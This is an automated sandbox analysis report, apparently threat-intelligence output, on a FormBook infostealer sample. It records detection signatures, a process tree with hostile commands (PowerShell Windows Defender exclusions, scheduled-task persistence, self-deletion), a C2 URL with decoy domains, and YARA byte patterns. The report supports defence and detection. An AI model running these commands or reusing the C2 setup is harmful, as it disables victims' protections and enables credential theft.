Edit tour

Windows Analysis Report
Outstanding payment.exe

Overview

General Information

Sample name:	Outstanding payment.exe
Analysis ID:	1592447
MD5:	43dc8c62e9343eb01c3ffb53390e2a55
SHA1:	af544600a7cba01add858593c892c58fe8d9b024
SHA256:	07abbe06a2d17f142846d33bda215df5b05355148c781cb9ff1c8f233f534cbc
Tags:	exeuser-threatcat_ch
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected FormBook

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Found direct / indirect Syscall (likely to bypass EDR)

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Switches to a custom stack to bypass stack traces

Tries to detect virtualization through RDTSC time measurements

Tries to resolve many domain names, but no domain seems valid

Uses netstat to query active network connections and open ports

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

Outstanding payment.exe (PID: 6252 cmdline: "C:\Users\user\Desktop\Outstanding payment.exe" MD5: 43DC8C62E9343EB01C3FFB53390E2A55)

powershell.exe (PID: 1532 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Outstanding payment.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5960 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iBSWjb.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 3920 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 4796 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iBSWjb" /XML "C:\Users\user\AppData\Local\Temp\tmpE0D0.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 5900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegSvcs.exe (PID: 2820 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

msiexec.exe (PID: 3876 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

cmd.exe (PID: 1292 cmdline: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

NETSTAT.EXE (PID: 4676 cmdline: "C:\Windows\SysWOW64\NETSTAT.EXE" MD5: 9DB170ED520A6DD57B5AC92EC537368A)

iBSWjb.exe (PID: 6648 cmdline: C:\Users\user\AppData\Roaming\iBSWjb.exe MD5: 43DC8C62E9343EB01C3FFB53390E2A55)

schtasks.exe (PID: 1352 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iBSWjb" /XML "C:\Users\user\AppData\Local\Temp\tmpF30F.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 3652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegSvcs.exe (PID: 6564 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.enelog.xyz/a03d/"], "decoy": ["nfluencer-marketing-13524.bond", "cebepu.info", "lphatechblog.xyz", "haoyun.website", "itiz.xyz", "orld-visa-center.online", "si.art", "alata.xyz", "mmarketing.xyz", "elnqdjc.shop", "ensentoto.cloud", "voyagu.info", "onvert.today", "1fuli9902.shop", "otelhafnia.info", "rumpchiefofstaff.store", "urvivalflashlights.shop", "0090.pizza", "ings-hu-13.today", "oliticalpatriot.net", "5970.pizza", "arimatch-in.legal", "eepvid.xyz", "bfootball.net", "otorcycle-loans-19502.bond", "nline-advertising-34790.bond", "behm.info", "aportsystems.store", "agiararoma.net", "agfov4u.xyz", "9769.mobi", "ome-renovation-86342.bond", "kkkk.shop", "duxrib.xyz", "xurobo.info", "leurdivin.online", "ive-neurozoom.store", "ndogaming.online", "dj1.lat", "yselection.xyz", "52628.xyz", "lsaadmart.store", "oftware-download-92806.bond", "avid-hildebrand.info", "orashrine.store", "erpangina-treatment-views.sbs", "ategorie-polecane-831.buzz", "oonlightshadow.shop", "istromarmitaria.online", "gmgslzdc.sbs", "asglobalaz.shop", "locarry.store", "eleefmestreech.online", "inggraphic.pro", "atidiri.fun", "olourclubbet.shop", "eatbox.store", "romatografia.online", "encortex.beauty", "8oosnny.xyz", "72266.vip", "aja168e.live", "fath.shop", "argloscaremedia.info"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000B.00000002.2149315222.0000000004301000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000B.00000002.2149315222.0000000004301000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000B.00000002.2149315222.0000000004301000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0xa7c1:$a1: 3C 30 50 4F 53 54 74 09 40 0x37be1:$a1: 3C 30 50 4F 53 54 74 09 40 0x210f0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x4e510:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xef2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x3c34f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x19e17:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x47237:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000B.00000002.2149315222.0000000004301000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xde78:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xe0e2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x3b298:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x3b502:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x19c15:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x47035:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x19701:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x46b21:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x19d17:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x47137:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x19e8f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x472af:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xeafa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x3bf1a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1897c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x45d9c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xf7f3:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x3cc13:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1fe57:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x4d277:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x20e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000B.00000002.2149315222.0000000004301000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1cd79:$sqlite3step: 68 34 1C 7B E1 0x1ce8c:$sqlite3step: 68 34 1C 7B E1 0x4a199:$sqlite3step: 68 34 1C 7B E1 0x4a2ac:$sqlite3step: 68 34 1C 7B E1 0x1cda8:$sqlite3text: 68 38 2A 90 C5 0x1cecd:$sqlite3text: 68 38 2A 90 C5 0x4a1c8:$sqlite3text: 68 38 2A 90 C5 0x4a2ed:$sqlite3text: 68 38 2A 90 C5 0x1cdbb:$sqlite3blob: 68 53 D8 7F 8C 0x1cee3:$sqlite3blob: 68 53 D8 7F 8C 0x4a1db:$sqlite3blob: 68 53 D8 7F 8C 0x4a303:$sqlite3blob: 68 53 D8 7F 8C
00000011.00000002.2169396425.0000000000870000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000011.00000002.2169396425.0000000000870000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000011.00000002.2169396425.0000000000870000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000011.00000002.2169396425.0000000000870000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000011.00000002.2169396425.0000000000870000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18809:$sqlite3step: 68 34 1C 7B E1 0x1891c:$sqlite3step: 68 34 1C 7B E1 0x18838:$sqlite3text: 68 38 2A 90 C5 0x1895d:$sqlite3text: 68 38 2A 90 C5 0x1884b:$sqlite3blob: 68 53 D8 7F 8C 0x18973:$sqlite3blob: 68 53 D8 7F 8C
00000010.00000002.4526105305.0000000002AF0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000010.00000002.4526105305.0000000002AF0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000010.00000002.4526105305.0000000002AF0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000010.00000002.4526105305.0000000002AF0000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000010.00000002.4526105305.0000000002AF0000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18809:$sqlite3step: 68 34 1C 7B E1 0x1891c:$sqlite3step: 68 34 1C 7B E1 0x18838:$sqlite3text: 68 38 2A 90 C5 0x1895d:$sqlite3text: 68 38 2A 90 C5 0x1884b:$sqlite3blob: 68 53 D8 7F 8C 0x18973:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000002.4544744783.00000000118C5000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_772cc62d	unknown	unknown	0xaf2:$a2: pass 0xaf8:$a3: email 0xaff:$a4: login 0xb06:$a5: signin 0xb17:$a6: persistent 0xcea:$r1: C:\Users\user\AppData\Roaming\21N13Q01\21Nlog.ini
0000000F.00000002.2162392386.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000F.00000002.2162392386.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000F.00000002.2162392386.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000F.00000002.2162392386.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000F.00000002.2162392386.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18809:$sqlite3step: 68 34 1C 7B E1 0x1891c:$sqlite3step: 68 34 1C 7B E1 0x18838:$sqlite3text: 68 38 2A 90 C5 0x1895d:$sqlite3text: 68 38 2A 90 C5 0x1884b:$sqlite3blob: 68 53 D8 7F 8C 0x18973:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.2114082596.0000000004234000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.2114082596.0000000004234000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.2114082596.0000000004234000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0xa0c59:$a1: 3C 30 50 4F 53 54 74 09 40 0xce079:$a1: 3C 30 50 4F 53 54 74 09 40 0xb7588:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xe49a8:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa53c7:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0xd27e7:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0xb02af:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0xdd6cf:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000000.00000002.2114082596.0000000004234000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xa4310:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xa457a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xd1730:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xd199a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xb00ad:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xdd4cd:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xafb99:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xdcfb9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xb01af:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xdd5cf:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xb0327:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xdd747:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa4f92:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xd23b2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xaee14:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xdc234:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa5c8b:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0xd30ab:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0xb62ef:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xe370f:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xb72f2:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.2114082596.0000000004234000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0xb3211:$sqlite3step: 68 34 1C 7B E1 0xb3324:$sqlite3step: 68 34 1C 7B E1 0xe0631:$sqlite3step: 68 34 1C 7B E1 0xe0744:$sqlite3step: 68 34 1C 7B E1 0xb3240:$sqlite3text: 68 38 2A 90 C5 0xb3365:$sqlite3text: 68 38 2A 90 C5 0xe0660:$sqlite3text: 68 38 2A 90 C5 0xe0785:$sqlite3text: 68 38 2A 90 C5 0xb3253:$sqlite3blob: 68 53 D8 7F 8C 0xb337b:$sqlite3blob: 68 53 D8 7F 8C 0xe0673:$sqlite3blob: 68 53 D8 7F 8C 0xe079b:$sqlite3blob: 68 53 D8 7F 8C
00000010.00000002.4526496675.00000000044E0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000010.00000002.4526496675.00000000044E0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000010.00000002.4526496675.00000000044E0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000010.00000002.4526496675.00000000044E0000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000010.00000002.4526496675.00000000044E0000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18809:$sqlite3step: 68 34 1C 7B E1 0x1891c:$sqlite3step: 68 34 1C 7B E1 0x18838:$sqlite3text: 68 38 2A 90 C5 0x1895d:$sqlite3text: 68 38 2A 90 C5 0x1884b:$sqlite3blob: 68 53 D8 7F 8C 0x18973:$sqlite3blob: 68 53 D8 7F 8C
00000010.00000002.4525873730.0000000002810000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000010.00000002.4525873730.0000000002810000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000010.00000002.4525873730.0000000002810000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000010.00000002.4525873730.0000000002810000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000010.00000002.4525873730.0000000002810000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18809:$sqlite3step: 68 34 1C 7B E1 0x1891c:$sqlite3step: 68 34 1C 7B E1 0x18838:$sqlite3text: 68 38 2A 90 C5 0x1895d:$sqlite3text: 68 38 2A 90 C5 0x1884b:$sqlite3blob: 68 53 D8 7F 8C 0x18973:$sqlite3blob: 68 53 D8 7F 8C
0000000B.00000002.2149315222.00000000044A7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000B.00000002.2149315222.00000000044A7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000B.00000002.2149315222.00000000044A7000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6231:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cb60:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa99f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x15887:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000B.00000002.2149315222.00000000044A7000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8c7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c8ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
